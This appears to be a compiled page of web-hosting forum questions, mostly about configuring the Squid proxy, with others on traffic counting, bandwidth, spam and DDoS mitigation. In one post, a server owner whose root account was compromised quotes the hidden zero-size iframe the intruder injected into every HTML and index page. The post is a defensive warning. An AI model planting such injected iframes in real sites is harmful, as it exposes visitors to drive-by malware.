I want to count the traffic for every IP passed through squid proxy server.
Is it possible to record the traffic numbers for every IP in external .txt file
It would be better if it can write outgoing and ingoing traffic.
I'm trying to set up a caching squid server to speed up website access. How can I selectively choose to cache certain PHP scripts while ignoring others? I can't seem to get it to work. I've commented out the following lines:
#acl QUERY urlpath_regex cgi-bin?
#no_cache deny QUERY
Yet in the squid/access.log file, I'm still seeing these:
Code:
1185561374.207 47 192.168.1.101 TCP_MISS/200 22267 GET http://www.mysite.com/? - DIRECT/192.168.1.108 text/html
i need help regarding my squid proxy when i go to this site. whatismyip.com i have this result
Your IP Address Is: 119.95.IP.IP
Other IPs Detected: 67.IP.IP.185
Possible Proxy Detected: 1.1 67.IP.IP.185ORT (squid/2.6.STABLE21)
how can i completly hide my ip via squid? this squid is running on my dedicated server,
i successfully installed Squid Proxy on my other Dedicated server however that dedicated server had 50 ip address, i am wondering if i can use those ip address for my Squid Proxy?
View 5 Replies View RelatedI have an apache server on windows which I wanted to speed up using caching systems.
I tried installing squid, and I got it working with a basic example config. It seemed to work well, however under more heavy load I experienced some weird behaviour where network output is 0 for several seconds at the time, and all clients just hang in the wind and wait for a respons.
Remote to the server is working fine, so it's definitely a squid issue.. with only apache running the server is constantly sending out data, no halts there.
Any hints on what errors I should be looking for?
Is it possible to implement reverse proxy for Sever-A through Sever-B.
The issue is let's say, Server-A is located in Network-A, and the Sever-B is located in Network-B. And the users in Network-B are allowed to access only to Sever-B while the Sever-B itself can access to Server-A. So, when the users from Network-B access to Sever-B, the traffic will be proxied through Sever-B to Server-A transparently without letting the users notice about how's the traffics go. The Server-B will be linux, thus squid is the primary proxy application to deal with. Is it possible to do with squid or it needs some other application?
How about a comparison of mod_proxy for apache vs. squid as all Sever-B should do is forward the requests coming from Network-B to forward to Sever-A and acting as a middle box between the two network scopes transparently. All the users in Network-B should do is accessing the Sever-B and the requests will be transparently going to Server-A without any configuration is done at their browser or any kind of NAT/Firewall rules on either of the networks.
I have 4 sub domains on qisoftware.com and most have network traffic between 30-34%. Unresolved traffic about 12-14%. Is the network traffic statistic high? What would be considered normal?
A proxy server can mask IP address, right? Does a proxy server show up as network traffic in site statistics reports?
Okay, maybe that's enough questions for right now. I have been researching the internet for terms but I am not finding what would be considered normal.
I have a customer who wants to have *all* their computer internet activity routed through a server in our datacenter.
They want MSN, email, ftp, browser, ping from the command line, and even DNS lookups that initiate from any software running on the computer...
... they want everything to be routed through the datacenter server.
None of it should go through the ISP. Not even DNS lookups.
I'm thinking that a VPN setup is the way to do this. (ie: Run openVPN on the server and use openVPN client on the remote computers.)
So the idea is that as long as they are connected to the VPN server in our datacenter, which creates an encrypted "tunnel", then all traffic will be routed through the datacenter VPN server. The ISP will not be able to see anything at all, except the connection to the VPN server.
I have a windows 2003 vps and I need way monitor how much traffic I make per month. I believe I'm getting close to my quota and I need to measure it.
I've seen some nice free programs that claim to work on windows 2003 server but the fact is they don't use a service so they only work while the GUI program runs, which is obviously silly for a server!
What do you guys use for this? I mean other then web traffic tools since most of my traffic is not HTTP!
I have done my research, befriend a few super proxy webmasters, and learned everything I need to know about being successful in the proxy business. So I am selling almost all my websites to fund this huge project. I will also be flipping proxies from time to time to fund the project even more. This will be a year long project and will be my full time job sooner or later. My goal is to have 1,000 proxy sites.
So with this knowledge, my questions are the following;
1) Which hosting plan should I get right now "Reseller" or "VPS"?
2) Which one would be more profitable in the short term?
I have question about the bandwidth. I have a VPS with 1000gb of bandwidth. How does it count actually. 500gb up & 500gb down or 1000gb up & 1000gb down or what? Is it the same with the shared hosting? I think I don't really need that much of bandwidth.
View 2 Replies View RelatedI got an alert from cpanel that a user had sent out 100s of emails and they were NOT being blocked, ofcourse to discover it was spam...without question, i deleted the account, thankfully i know who the site belongs too, and ofcourse im sure they didnot send spam,:..
1) Is it within common practice to delete someones account once such is noticed occuring on their account?..with or without notice
2) How can the server block such mass emails from being sent out? ( I have recently advised some of our clients to use newsletter services to send out mass mails if they have to send to 100+ plus people)
3) I found the script that sent out the spam emails..it was a file called sky.php i deleted but i never got a warning that such a file had been uploaded to that account...
I have 2 questions:
1. Upload files count in my bandwith?
2. Remote Backups count in my bandwith?
On 4/11 at 5:30pm, my server's root was compromised and someone had a field day on my server. Surprisingly with the level of access they had, the person very quietly ran a script (I've yet to find the file, but saw reference to it in another forum about this) that updated every single .html, .htm, and *index.php file in the homes directory. I can't even count how many files were edited -- atleast 100-200 files I've had to manually change thus far.
That said, I wanted to warn everyone about this. My google results were slim on this subject. What I find really surprising is that Avast! is the only anti-virus software to warn me of the possible malware being opened. I use either at home or at my office Avast!, BitDefender 2008, Symantec Corporate Antivirus, and McAfee corporate Antivirus. I just installed Avast! yesterday just for "peace of mind" and I'm damned glad that I did because it immediately popped up about HTML:iframe-gen malware on my websites.
I have enabled e-mail sending whenever someone logs into the root account on my server -- which I believe I received the tutorial from here in the How-To section -- and I did receive an e-mail for the person logging into the root account via SSH, but the IP address and hostname was left blank. Does anyone know why the IP and hostname would be blank? That doesn't mean they were console, does it?
Here is the HTML code that was inserted into all of my .htm, .html, and *index.php files:
<iframe src=[url] width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
I've recently taken over the hosting of a large site and forum, and I want to use some for of statistics software of service so that I can determine how many unique visitors and pageviews the site and forum get (which can then be used when dealing with advertisers).
I've been using Webalizer for years, but it's not been updated in over 5 years, so it's out. I then stumbled on Awstats, which works great, but... it doesn't calculate the pageviews correctly.
At the present moment Awstats claims to have tracked approx. 2 million pageviews for the (vBulletin) forum. However, when I scroll down I notice that on number #1 in the "Pages URL Top 10" is image.php, which is used for avatars and is not a page!
Now it appears Awstats has two ways of dealing with this: the "SkipFiles" option and the "NotPageList" option. The first (SkipFiles) drops whole URLs from the stats, which isn't what I want: I just don't want them to be counted as pages.
The second (NotPageList) only accepts file extentions, not script names. This again isn't what I want: hits on showthread.php should still be counted as pages, only hits on image.php shouldn't be.
The site has a similar problem where I don't want scripts like stylesheet.php, rss.php and xml.php from being counted as pages.
My question: does anyone know a solution for this problem? Maybe a hack to allow "NotPageList" to accept script names and/or ULRs?
Alternatively: does anyone know another statistics package that's about on par or better than Awstats that can do this (and that works on Linux/Unix with logs generated by lighttpd+php-fastcgi) and that is not too expensive (max $200)?
Google Analytics isn't suitable for me (even though it would probably work well) because the site goes over 5 million pageviews/month and I don't have a Adwords account.
Is there a way of doing a simple visitor count, ideally by incrementing a number in a text file...
E.g: [URL] ...
would increment a number in text file 'client1', and still display http://mysite.org as normal?
I've asked sales a few times but they don't seem to know...what counts as a "website?" In PPA as a test we set up two subscriptions and one mail-only secondary domain on one of them. The Services/Websites tab lists all three, but only two are marked as Website under Hosting Type while the third is marked No Hosting. Does that count as two websites for license purposes, or three?
I'm trying to plan for multiple domains, subdomains, etc.
What traffic monitor would everyone recommend for sites that have as many as 5,000 to 10,000 hits an hour?
View 8 Replies View RelatedAfter having conversation with many WHT members and few other system admins I have not been been to resolve an issue yet.
I have a Basic VPS and squid runs fine on it.
Debian 4
Squid 3
Now the issue is that I have 2 IP allocated to my VPS. But no matter what configuration i have on squid.conf file , no matter what version of Squid i use,I am not able to have the additional Ip on my vps as Outgoing External IP address.
I have also tried this config setting :
acl ip1 myip 192.168.1.2
acl ip2 myip 192.168.1.3
acl ip3 myip 192.168.1.4
tcp_outgoing_address 192.168.1.2 ip1
tcp_outgoing_address 192.168.1.3 ip2
tcp_outgoing_address 192.168.1.4 ip3
But no luck yet.
I currently have a site running on 8 servers : 5 web servers (apache2/php5), 2 DB servers (mysql 5), and one front reverse proxy server.
Currently I use apache as the reverse proxy (with mod_proxy of course).
I have it do 3 type of things:
1) serve some static files (the website's static files) directly from the front server. The files are stored in local directories.
2) cache some other static files (user uploaded images and files) on the front server after downloading them once from the backend webservers. This is done via mod_cache.
3) route some requests to specific web servers depending on a subdomain (on the first few letters of the subdomain more precisely). To do this i use rewrite rules like :
RewriteCond %{HTTP_HOST}^sub1(.*).domain.com$
RewriteRule ^(.*) http://sub1%1.webserver1.com/$1 [P,L]
RewriteCond %{HTTP_HOST}^sub2(.*).domain.com$
RewriteRule ^(.*) http://sub2%1.webserver2.com/$1 [P,L]
etc.
My web servers are not in a cluster from this point of view, so it is important that the reverse proxy is able to route requests based on subdomain like this.
Now I have a few weird performance problems on the front server. CPU, hard disk usage and memory usage keep staying at relatively constant (and always low) levels, yet the server load periodically spikes to places anywhere between 4 and 12 during the day. This seems to be mod_cache related (spikes disappear when i disable it) but I can't figure what's happenning, and I'm reading everywhere squid is a better alternative to do reverse proxying.
Only, I don't know if i can do the same as mentionned above with squid. From what I read, I know I can do 2). However I'm not sure if squid is able to serve some files (based on URL patterns) directly from the local file system rather than querying them / caching them locally ? And can squid route the reverse proxy requests to different web servers based on the subdomain in a URL?
The DC installed Squid. It manages the load fine but the php code on my page is cached and doesn't work.
Is there a way to get squid to not cache php? in that httpd can directly call php while squid does everything else?
I just installed Squid V3. I set up putty to ssh socks proxy to my vps that I installed squid on.
Here is a snippet of my cache.logs, but there is no cache log of websites I have visited. The access.log is empty.
How to I tell if squid is working?
Quote:
2009/04/04 22:52:37| Starting Squid Cache version 3.0.STABLE13-20090405 for i686-pc-linux-gnu...
2009/04/04 22:52:37| Process ID 9886
2009/04/04 22:52:37| With 1024 file descriptors available
2009/04/04 22:52:37| Performing DNS Tests...
2009/04/04 22:52:37| Successful DNS name lookup tests...
2009/04/04 22:52:37| DNS Socket created at 0.0.0.0, port 36048, FD 7
2009/04/04 22:52:37| Adding nameserver 208.67.222.222 from /etc/resolv.conf
2009/04/04 22:52:37| Adding nameserver 208.67.220.220 from /etc/resolv.conf
2009/04/04 22:52:37| Unlinkd pipe opened on FD 12
2009/04/04 22:52:37| Swap maxSize 102400 KB, estimated 7876 objects
2009/04/04 22:52:37| Target number of buckets: 393
2009/04/04 22:52:37| Using 8192 Store buckets
2009/04/04 22:52:37| Max Mem size: 8192 KB
2009/04/04 22:52:37| Max Swap size: 102400 KB
2009/04/04 22:52:37| Version 1 of swap file with LFS support detected...
2009/04/04 22:52:37| Rebuilding storage in /usr/local/squid/var/cache (CLEAN)
2009/04/04 22:52:37| Using Least Load store dir selection
2009/04/04 22:52:37| Set Current Directory to /usr/local/squid/var/cache
2009/04/04 22:52:37| Loaded Icons.
2009/04/04 22:52:37| Accepting HTTP connections at 0.0.0.0, port 8080, FD 14.
2009/04/04 22:52:37| Accepting ICP messages at 0.0.0.0, port 3130, FD 15.
2009/04/04 22:52:37| HTCP Disabled.
2009/04/04 22:52:37| Ready to serve requests.
2009/04/04 22:52:37| Done reading /usr/local/squid/var/cache swaplog (0 entries)
2009/04/04 22:52:37| Finished rebuilding storage from disk.
2009/04/04 22:52:37| 0 Entries scanned
2009/04/04 22:52:37| 0 Invalid entries.
2009/04/04 22:52:37| 0 With invalid flags.
2009/04/04 22:52:37| 0 Objects loaded.
2009/04/04 22:52:37| 0 Objects expired.
2009/04/04 22:52:37| 0 Objects cancelled.
2009/04/04 22:52:37| 0 Duplicate URLs purged.
2009/04/04 22:52:37| 0 Swapfile clashes avoided.
2009/04/04 22:52:37| Took 0.02 seconds ( 0.00 objects/sec).
2009/04/04 22:52:37| Beginning Validation Procedure
2009/04/04 22:52:37| Completed Validation Procedure
2009/04/04 22:52:37| Validated 25 Entries
2009/04/04 22:52:37| store_swap_size = 0
2009/04/04 22:52:38| storeLateRelease: released 0 objects
2009/04/04 22:59:06| Squid is already running! Process ID 9886
to install squid-2.5.STABLE14 with yum, but when i run "yum install squid" another version going for install.
View 2 Replies View RelatedWhenever I am using getacoder and try to post a message on the private message boards I get a squid error like this:
ERROR
The requested URL could not be retrieved
--------------------------------------------------------------------------------
While trying to retrieve the URL: [url]
The following error was encountered:
Zero Sized Reply
Squid did not receive any data for this request.
Your cache administrator is webmaster.
--------------------------------------------------------------------------------
Generated Tue, 22 Jul 2008 16:09:13 GMT by igw-ipcop.netarcs.com (squid/2.5.STABLE14)
Could anyone with server geekish skills tell me what may be the problem here might be (I should mention that their annoying support contact form uses the same script hence I can't even get in touch)? What's that ipcop thing about? Do they have some program at the server level filtering IP and mine is no good or what?
I'm aware the REMOTE_ADDR revealed in Squid needs to be a legitimate IP address to communicate properly across the internet. But I'd like Squid to use and publically reveal a different IP address than the default system IP address on our proxy servers. Does anyone know if its possible to make the Squid REMOTE_ADDR use a different IP address on the system other than default.
I've defined a different IP address and port for http_port at the top of the squid.conf file. And I can connect to this IP address and Port successfully. But when I run the connection through an IP address checker, or session environment test, it reveals the actual system IP address and not the http_port IP address.
Can someone provide me a guide to fully install and configure Squid.
View 2 Replies View RelatedI want to software load balance one of my website using squid. It doesn't look like it is possible with squid 2.5. Squid 2.6 is a upgrade for FC6. I am running FC4 and it cannot be installed with a lot of dependency failures.
Has anyone successfully installed Squid 2.6 on FC4?
I have a proxy site which is hosted with a proxy host, do i have to use proxy hosting as i have an account with another host i might want to use. The proxy hosting has run out.
View 2 Replies View RelatedI would like to use cPanel Apache as the backend web server, and Squid cache as the front end http accelerator.
My VPS has two IP addresses, however, I want the httpd acceleration to occur only on one IP.
So far, I have installed squid cache and edited its config file to this:
http_port 74.50.118.189:80
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_single_host on
httpd_accel_uses_host_header on
acl all src 0.0.0.0/0.0.0.0
http_access allow all
My site has a few subdomains and I would like them to work.
So, what do I do now in the apache config (which I think is here: /etc/httpd/conf/httpd.conf ?)
For 2 weeks I am under DDoS.
The type of DDoS is the one that comes from DC clients.
I have managed to mitigate the attack and to get everything working ok.
I do not like the solution I came up with for many reasons and I found that squid can be good on stopping bad requests like the one that DC clients send when the attack occurs.
I am kinda new to squid and I do not know all the settings.
I have configured It and everything works great when there is no DDoS.
But when the attacks starts , nothing works. Squid does not log anything in access_log and also, there is no load, just a lot of connections to squid.
Is there a limit for max concurrent connections in squid ?
Or the ideea of using squid as a reverse proxy without caching, just to stop bad requests is a bad one ? (I do not need snort-inline, I have some issues with it).
